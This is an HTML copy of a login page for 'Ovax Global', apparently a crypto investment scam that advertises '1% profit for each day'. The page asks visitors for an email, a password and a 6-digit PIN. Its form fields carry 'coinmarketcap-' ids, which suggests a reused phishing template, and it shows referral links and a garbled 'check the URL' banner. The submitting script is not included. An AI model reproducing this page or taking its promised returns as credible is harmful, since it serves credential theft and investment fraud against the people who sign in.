<!DOCTYPE html>
<html lang="en">
  <div
    id="in-page-channel-node-id"
    data-channel-name="in_page_channel_Bc9W7y"
  ></div>
  <head>
    <meta charset="utf-8" />

    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <meta content="ie=edge" http-equiv="x-ua-compatible" />
    <title>Login to account - Ovax Global</title>
    <meta
      name="description"
      content="Make your crypto work for you and get from 1% profit for each day!"
    />

    <!-- Facebook Meta Tags -->
    <meta property="og:url" content="https://ovaxglobal.com/" />
    <meta property="og:type" content="website" />
    <meta
      property="og:title"
      content="OVAX GLOBAL - your reliable partner in the world of blockchain investments!"
    />
    <meta
      property="og:description"
      content="Make your crypto work for you and get from 1% profit for each day!"
    />
    <meta property="og:image" content="assets/img/preview.png" />
    <meta property="og:site_name" content="OvaxGlobal" />

    <!-- Twitter Meta Tags -->
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="twitter:domain" content="ovaxglobal.com" />
    <meta property="twitter:url" content="https://ovaxglobal.com/" />
    <meta
      name="twitter:title"
      content="OVAX GLOBAL - your reliable partner in the world of blockchain investments!"
    />
    <meta
      name="twitter:description"
      content="Make your crypto work for you and get from 1% profit for each day!"
    />
    <meta name="twitter:image" content="assets/img/preview.png" />

    <!-- favicon -->
    <link rel="image_src" href="assets/img/preview.png" />
    <link
      rel="apple-touch-icon"
      sizes="180x180"
      href="assets/img/favicon/apple-touch-icon.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="32x32"
      href="assets/img/favicon/favicon-32x32.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="16x16"
      href="assets/img/favicon/favicon-16x16.png"
    />
    <link rel="manifest" href="assets/img/favicon/site.webmanifest" />
    <link
      rel="mask-icon"
      href="assets/img/favicon/safari-pinned-tab.svg"
      color="#5bbad5"
    />
    <meta name="msapplication-TileColor" content="#ffffff" />
    <meta name="theme-color" content="#ffffff" />
    <style>
      :root {
        --animate-duration: 1s;
        --animate-delay: 1s;
        --animate-repeat: 1;
      }
      :root {
        --swiper-theme-color: #007aff;
      }
      :root {
        --swiper-navigation-size: 44px;
      }
      html {
        box-sizing: border-box;
        -ms-overflow-style: scrollbar;
      }
      *,
      :after,
      :before {
        box-sizing: inherit;
      }
      html {
        line-height: 1.15;
        -webkit-text-size-adjust: 100%;
      }
      body {
        margin: 0;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-BlackItalic.eot);
        src: url(assets/fonts/FactorA-BlackItalic.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-BlackItalic.woff2) format('woff2'),
          url(assets/fonts/FactorA-BlackItalic.woff) format('woff'),
          url(assets/fonts/FactorA-BlackItalic.ttf) format('truetype'),
          url(assets/fonts/FactorA-BlackItalic.svg#FactorA-BlackItalic)
            format('svg');
        font-weight: 900;
        font-style: italic;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-LightItalic.eot);
        src: url(assets/fonts/FactorA-LightItalic.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-LightItalic.woff2) format('woff2'),
          url(assets/fonts/FactorA-LightItalic.woff) format('woff'),
          url(assets/fonts/FactorA-LightItalic.ttf) format('truetype'),
          url(assets/fonts/FactorA-LightItalic.svg#FactorA-LightItalic)
            format('svg');
        font-weight: 300;
        font-style: italic;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-MediumItalic.eot);
        src: url(assets/fonts/FactorA-MediumItalic.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-MediumItalic.woff2) format('woff2'),
          url(assets/fonts/FactorA-MediumItalic.woff) format('woff'),
          url(assets/fonts/FactorA-MediumItalic.ttf) format('truetype'),
          url(assets/fonts/FactorA-MediumItalic.svg#FactorA-MediumItalic)
            format('svg');
        font-weight: 500;
        font-style: italic;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-Regular.eot);
        src: url(assets/fonts/FactorA-Regular.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-Regular.woff2) format('woff2'),
          url(assets/fonts/FactorA-Regular.woff) format('woff'),
          url(assets/fonts/FactorA-Regular.ttf) format('truetype'),
          url(assets/fonts/FactorA-Regular.svg#FactorA-Regular) format('svg');
        font-weight: 400;
        font-style: normal;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-Light.eot);
        src: url(assets/fonts/FactorA-Light.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-Light.woff2) format('woff2'),
          url(assets/fonts/FactorA-Light.woff) format('woff'),
          url(assets/fonts/FactorA-Light.ttf) format('truetype'),
          url(assets/fonts/FactorA-Light.svg#FactorA-Light) format('svg');
        font-weight: 300;
        font-style: normal;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-Extrabold.eot);
        src: url(assets/fonts/FactorA-Extrabold.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-Extrabold.woff2) format('woff2'),
          url(assets/fonts/FactorA-Extrabold.woff) format('woff'),
          url(assets/fonts/FactorA-Extrabold.ttf) format('truetype'),
          url(assets/fonts/FactorA-Extrabold.svg#FactorA-Extrabold)
            format('svg');
        font-weight: 800;
        font-style: normal;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-Medium.eot);
        src: url(assets/fonts/FactorA-Medium.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-Medium.woff2) format('woff2'),
          url(assets/fonts/FactorA-Medium.woff) format('woff'),
          url(assets/fonts/FactorA-Medium.ttf) format('truetype'),
          url(assets/fonts/FactorA-Medium.svg#FactorA-Medium) format('svg');
        font-weight: 500;
        font-style: normal;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-Black.eot);
        src: url(assets/fonts/FactorA-Black.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-Black.woff2) format('woff2'),
          url(assets/fonts/FactorA-Black.woff) format('woff'),
          url(assets/fonts/FactorA-Black.ttf) format('truetype'),
          url(assets/fonts/FactorA-Black.svg#FactorA-Black) format('svg');
        font-weight: 900;
        font-style: normal;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-Bold.eot);
        src: url(assets/fonts/FactorA-Bold.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-Bold.woff2) format('woff2'),
          url(assets/fonts/FactorA-Bold.woff) format('woff'),
          url(assets/fonts/FactorA-Bold.ttf) format('truetype'),
          url(assets/fonts/FactorA-Bold.svg#FactorA-Bold) format('svg');
        font-weight: 700;
        font-style: normal;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-ExtraboldItalic.eot);
        src: url(assets/fonts/FactorA-ExtraboldItalic.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-ExtraboldItalic.woff2) format('woff2'),
          url(assets/fonts/FactorA-ExtraboldItalic.woff) format('woff'),
          url(assets/fonts/FactorA-ExtraboldItalic.ttf) format('truetype'),
          url(assets/fonts/FactorA-ExtraboldItalic.svg#FactorA-ExtraboldItalic)
            format('svg');
        font-weight: 800;
        font-style: italic;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-BoldItalic.eot);
        src: url(assets/fonts/FactorA-BoldItalic.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-BoldItalic.woff2) format('woff2'),
          url(assets/fonts/FactorA-BoldItalic.woff) format('woff'),
          url(assets/fonts/FactorA-BoldItalic.ttf) format('truetype'),
          url(assets/fonts/FactorA-BoldItalic.svg#FactorA-BoldItalic)
            format('svg');
        font-weight: 700;
        font-style: italic;
        font-display: swap;
      }
      @font-face {
        font-family: Factor A;
        src: url(assets/fonts/FactorA-Italic.eot);
        src: url(assets/fonts/FactorA-Italic.eot?#iefix)
            format('embedded-opentype'),
          url(assets/fonts/FactorA-Italic.woff2) format('woff2'),
          url(assets/fonts/FactorA-Italic.woff) format('woff'),
          url(assets/fonts/FactorA-Italic.ttf) format('truetype'),
          url(assets/fonts/FactorA-Italic.svg#FactorA-Italic) format('svg');
        font-weight: 400;
        font-style: italic;
        font-display: swap;
      }
      * {
        box-sizing: border-box;
      }
      html,
      body {
        font-family: Factor A, sans-serif;
      }
      html {
        font-size: 14px;
      }
      @media (max-width: 480px) {
        html {
          font-size: 12px;
        }
      }
    </style>
    <link
      rel="stylesheet"
      href="styles.d995040112bc1c68.css"
      media="all"
      onload="this.media='all'"
    />
    <noscript
      ><link rel="stylesheet" href="styles.d995040112bc1c68.css"
    /></noscript>
    <style>
      #spinner[_ngcontent-alr-c9] {
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        position: fixed;
        z-index: 9999;
      }
      #spinner.backdrop[_ngcontent-alr-c9] {
        top: 0;
        left: 0;
        height: 100%;
        width: 100%;
        display: flex;
        align-items: center;
        justify-content: center;
        transform: none;
      }
      .colored-parent,
      .colored > div {
        background-color: #333;
      }
    </style>
    <style>
      .spinner[_ngcontent-alr-c10] {
        width: 68px;
        height: 68px;
        border: 5px dotted #fff;
        border-style: solid solid dotted dotted;
        border-radius: 50%;
        display: inline-block;
        position: relative;
        box-sizing: border-box;
        animation: _ngcontent-alr-c10_rotation 2s linear infinite;
      }
      .spinner[_ngcontent-alr-c10]:after {
        content: '';
        box-sizing: border-box;
        position: absolute;
        inset: 0;
        margin: auto;
        border: 5px dotted #f12a23;
        border-style: solid solid dotted;
        width: 44px;
        height: 44px;
        border-radius: 50%;
        animation: _ngcontent-alr-c10_rotationBack 1s linear infinite;
        transform-origin: center center;
      }
      @keyframes _ngcontent-alr-c10_rotation {
        0% {
          transform: rotate(0);
        }
        to {
          transform: rotate(360deg);
        }
      }
      @keyframes _ngcontent-alr-c10_rotationBack {
        0% {
          transform: rotate(0);
        }
        to {
          transform: rotate(-360deg);
        }
      }
    </style>
  </head>
  <body
    style="padding-right: 0px; overflow-y: auto"
    data-aos-easing="ease"
    data-aos-duration="1200"
    data-aos-delay="0"
  >
    <app-root ng-version="15.2.3"
      ><ng-http-loader _nghost-alr-c9=""></ng-http-loader
      ><router-outlet></router-outlet
      ><ng-component
        ><div class="wrapper">
          <div class="sign">
            <div class="container">
              <div class="row d-flex align-items-center">
                <div class="col-6 col-lg-4 order-lg-1">
                  <a routerlink="/" class="sign-logo" href="/"
                    ><img src="assets/img/logo-dark.svg" alt=""
                  /></a>
                </div>
                <div
                  class="col-6 col-lg-3 d-flex justify-content-end order-lg-3"
                >
                  <a routerlink="/" class="sign-home" href="/"
                    ><svg>
                      <use xlink:href="assets/img/sprite.svg#arrow-3"></use>
                    </svg>
                    Homepage
                    <div class="sign-home__icon">
                      <svg>
                        <use xlink:href="assets/img/sprite.svg#home"></use>
                      </svg></div
                  ></a>
                </div>
                <div class="sign-links col-lg-5 order-lg-2">
                  <a
                    routerlink="signin"
                    routerlinkactive="active"
                    href="signin"
                    class="active"
                    ><svg>
                      <use xlink:href="assets/img/sprite.svg#logout"></use>
                    </svg>
                    <h3>Login</h3>
                    <p>Login to account</p></a
                  ><a
                    routerlink="https://ovaxglobal.com/?ref=837371457"
                    routerlinkactive="active"
                    href="https://ovaxglobal.com/?ref=837371457"
                    class=""
                    ><svg>
                      <use xlink:href="assets/img/sprite.svg#reg"></use>
                    </svg>
                    <h3>Registration</h3>
                    <p>Create an account</p></a
                  >
                </div>
              </div>
              <router-outlet></router-outlet
              ><ng-component class="w100"
                ><div class="row">
                  <div class="col-lg-8 offset-lg-2">
                    <div class="m-title m-title_center">
                      Login to <b>account<span>.</span></b>
                    </div>
                    <auth-green-bar path="auth/signin"
                      ><div class="sign-url">
                        <div class="sign-url__icon">
                          <svg>
                            <use
                              xlink:href="assets/img/sprite.svg#warning"
                            ></use>
                          </svg>
                        </div>
                        <h3>Make sure you enter your details on the page</h3>
                        <div class="sign-url__val">
                          <svg>
                            <use xlink:href="assets/img/sprite.svg#lock"></use>
                          </svg>
                          <p><span>https://</span>www.ovaxglobal.comsignin</p>
                        </div>
                      </div></auth-green-bar
                    >
                    <form
                      novalidate="true"
                      autocomplete="off"
                      class="ng-dirty ng-touched ng-valid"
                    >
                      <fieldset>
                        <div class="row">
                          <div class="col-md-6">
                            <div class="m-input__title">E-mail</div>
                            <label class="m-input"
                              ><input
                                id="coinmarketcap-username"
                                type="email"
                                formcontrolname="email"
                                maxlength="64"
                                inputvalidation=""
                                autofocus=""
                                placeholder="Enter your e-mail"
                                id="coinmarketcap-username"
                                class="ng-dirty ng-valid ng-touched" /><svg>
                                <use
                                  xlink:href="assets/img/sprite.svg#email"
                                ></use></svg
                            ></label>
                          </div>
                          <div class="col-md-6">
                            <div class="m-input__title">Password</div>
                            <label class="m-input m-input_pass"
                              ><input
                                id="coinmarketcap-password"
                                formcontrolname="password"
                                maxlength="32"
                                inputvalidation=""
                                placeholder="Enter your password"
                                type="password"
                                class="ng-dirty ng-valid ng-touched" /><svg>
                                <use
                                  xlink:href="assets/img/sprite.svg#pass"
                                ></use>
                              </svg>
                              <div
                                class="m-input__show"
                                title="show / hide password"
                              >
                                <svg>
                                  <use
                                    xlink:href="assets/img/sprite.svg#show"
                                  ></use>
                                </svg></div></label
                            ><a
                              routerlink="/auth/reset"
                              class="sign-forgot"
                              href="/auth/reset"
                              >I forgot my password</a
                            >
                          </div>
                        </div>
                        <div id="financial-pin" class="sign-auth">
                          <div class="sign-auth__top">
                            <img src="assets/img/sign-auth.svg" alt="" />
                            <h3>Your account is protected</h3>
                            <p>
                              For authorization, you must enter the 6-digit
                              PIN-code that you came up with when registering
                              your account
                            </p>
                          </div>
                          <label class="sign-auth__input"
                            ><input
                              id="coinmarketcap-secret"
                              type="text"
                              formcontrolname="otp"
                              maxlength="6"
                              placeholder="Enter PIN code"
                              class="ng-pristine ng-invalid ng-touched" /><svg>
                              <use
                                xlink:href="assets/img/sprite.svg#code"
                              ></use></svg
                          ></label>
                        </div>
                        <button
                          id="coinmarketcap-login"
                          class="m-btn m-btn_full"
                        >
                          Sign in
                        </button>
                      </fieldset>
                    </form>
                    <auth-signup-link
                      ><div class="sign-text" style="margin-bottom: 60px">
                        Don't have an account yet?
                        <a
                          routerlink="https://ovaxglobal.com/?ref=837371457"
                          href="https://ovaxglobal.com/?ref=837371457"
                          >Create it right now</a
                        >
                      </div></auth-signup-link
                    >
                  </div>
                </div></ng-component
              >
            </div>
          </div>
        </div></ng-component
      >
    </app-root>
    <script src="client.js"></script>
  </body>
</html>
